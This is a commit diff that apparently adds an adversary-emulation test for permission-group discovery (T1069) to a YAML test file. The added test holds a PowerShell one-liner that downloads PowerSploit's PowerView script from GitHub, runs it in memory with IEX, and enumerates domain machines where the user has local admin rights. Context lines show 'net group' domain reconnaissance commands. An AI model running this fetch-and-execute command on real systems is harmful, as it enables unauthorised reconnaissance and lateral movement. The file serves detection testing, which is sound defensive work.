T1069 - Find machines where user has local admin access (PowerView) (#1001)

* write test

* link to specific commit of file
This commit is contained in:
Andrew Beers
2020-05-21 16:23:28 -05:00
committed by GitHub
parent f1cc467b21
commit e73b02b0b3
+13
View File
@@ -75,3 +75,16 @@ atomic_tests:
net groups "Account Operators" /doma
net groups "Exchange Organization Management" /doma
net group "BUILTIN\Backup Operators" /doma
- name: Find machines where user has local admin access (PowerView)
description: |
Find machines where user has local admin access (PowerView). Upon execution, progress and info about each host in the domain being scanned will be displayed.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Find-LocalAdminAccess -Verbose